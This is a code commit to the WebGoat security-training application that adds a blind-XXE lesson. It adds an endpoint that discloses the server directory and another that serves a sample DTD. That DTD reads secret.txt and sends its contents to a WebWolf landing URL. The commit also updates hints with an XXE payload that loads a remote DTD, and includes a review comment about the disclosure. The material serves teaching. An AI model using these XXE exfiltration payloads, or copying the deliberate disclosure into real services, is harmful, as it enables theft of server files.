xxe path info (#670)
* xxe path info aid added * xxe path info aid added * changes to template file and hints * added ssl test support for XXE * added ssl test support for XXE * restconfig replaced by httpsrelaxed * processed review comments on hints and example
@ -29,14 +29,17 @@ import org.owasp.webgoat.assignments.AssignmentHints;
|
||||
import org.owasp.webgoat.assignments.AttackResult;
|
||||
import org.springframework.beans.factory.annotation.Autowired;
|
||||
import org.springframework.beans.factory.annotation.Value;
|
||||
import org.springframework.http.MediaType;
|
||||
import org.springframework.web.bind.annotation.PostMapping;
|
||||
import org.springframework.web.bind.annotation.RequestBody;
|
||||
import org.springframework.web.bind.annotation.RequestMapping;
|
||||
import org.springframework.web.bind.annotation.ResponseBody;
|
||||
import org.springframework.web.bind.annotation.RestController;
|
||||
|
||||
import static org.springframework.http.MediaType.ALL_VALUE;
|
||||
import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
|
||||
|
||||
|
||||
/**
|
||||
* @author nbaars
|
||||
* @since 4/8/17.
|
||||
@ -50,6 +53,11 @@ public class SimpleXXE extends AssignmentEndpoint {
|
||||
|
||||
@Value("${webgoat.server.directory}")
|
||||
private String webGoatHomeDirectory;
|
||||
|
||||
@Value("${webwolf.url.landingpage}")
|
||||
private String webWolfURL;
|
||||
|
||||
|
||||
@Autowired
|
||||
private Comments comments;
|
||||
|
||||
@ -77,4 +85,20 @@ public class SimpleXXE extends AssignmentEndpoint {
|
||||
}
|
||||
return success;
|
||||
}
|
||||
|
||||
@RequestMapping(path="/xxe/tmpdir",consumes = ALL_VALUE, produces=MediaType.TEXT_PLAIN_VALUE)
|
||||
@ResponseBody
|
||||
public String getWebGoatHomeDirectory() {
|
||||
return webGoatHomeDirectory;
|
||||
}
|
||||
|
||||
@RequestMapping(path="/xxe/sampledtd",consumes = ALL_VALUE, produces=MediaType.TEXT_PLAIN_VALUE)
|
||||
@ResponseBody
|
||||
public String getSampleDTDFile() {
|
||||
return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
|
||||
"<!ENTITY % file SYSTEM \"file:replace-this-by-webgoat-temp-directory/XXE/secret.txt\">\n" +
|
||||
"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://replace-this-by-webwolf-base-url/landing?text=%file;'>\">\n" +
|
||||
"%all;";
|
||||
}
|
||||
|
||||
}
|
||||
|
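Review bot: getWebGoatHomeDirectory on `/xxe/tmpdir` returns the server's configured home directory to any HTTP caller, and its `@RequestMapping` carries no `method`, so every verb is accepted; since the new hint text relies on this disclosure, the intent should be stated on the method rather than left implicit. Suggest a Javadoc such as `/** Deliberately discloses the WebGoat home directory so the blind-XXE lesson can build a file: URL for secret.txt. */` and narrowing the mapping with `method = RequestMethod.GET` (`org.springframework.web.bind.annotation.RequestMethod` is not among the visible imports). The same documentation and method restriction apply to getSampleDTDFile on `/xxe/sampledtd`, whose returned template still carries the `replace-this-by-...` placeholders even though `webGoatHomeDirectory` and `webWolfURL` are injected on the class. `consumes = ALL_VALUE` is also unusual on a read-only endpoint and could be dropped. The enclosing class starts outside the hunks; only its closing brace is visible.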
@ -42,5 +42,5 @@ xxe.hints.content.type.xxe.2=Does the endpoint only accept json messages?
|
||||
xxe.blind.hints.1=This assignment is more complicated you need to upload the contents of a file to the attackers site (WebWolf in this case)
|
||||
xxe.blind.hints.2=In this case you cannot combine external entities in combination with internal entities.
|
||||
xxe.blind.hints.3=Use parameter entities to perform the attack, see for example: https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/
|
||||
xxe.blind.hints.4=An example DTD can be found here WebGoat/images/example.dtd, include this DTD in the xml comment
|
||||
xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "http://localhost:9090/files/test1234/test.dtd">%remote;]><comment><text>test&send;</text></comment>
|
||||
xxe.blind.hints.4=An example DTD can be found [[webgoat base url]]/WebGoat/xxe/sampledtd, include this DTD in the xml comment
|
||||
xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: <?xml version="1.0"?><!DOCTYPE comment [<!ENTITY % remote SYSTEM "[[webwolf base url]]/files/[[user]]/test.dtd">%remote;]><comment><text>test&send;</text></comment>
|
||||
|
@ -1,21 +1,16 @@
|
||||
== Blind XXE assignment
|
||||
|
||||
In the previous page we showed you how you can ping a server with a XXE attack, in this assignment try to make a DTD
|
||||
which will upload the contents of ~/.webgoat/plugin/XXE/secret.txt to our server. You can use WebWolf to serve your
|
||||
DTD.
|
||||
which will upload the contents of a file secret.txt from the WebGoat server to our WebWolf server. You can use WebWolf to serve your DTD.
|
||||
The secret.txt is located on the WebGoat server in this location, so you do not need to scan all directories and files:
|
||||
|
||||
|
||||
|===
|
||||
|OS |Location
|
||||
|
||||
|Linux
|
||||
|`/home/USER/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|
||||
|`operatingSystem:os[]`
|
||||
|`webGoatTempDir:temppath[]/XXE/secret.txt`
|
||||
|
||||
|Windows
|
||||
|`c:/Users/USER/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|
||||
|
||||
|Docker
|
||||
|`/home/webgoat/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|
||||
|===
|
||||
|
||||
Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink]`
|
||||
|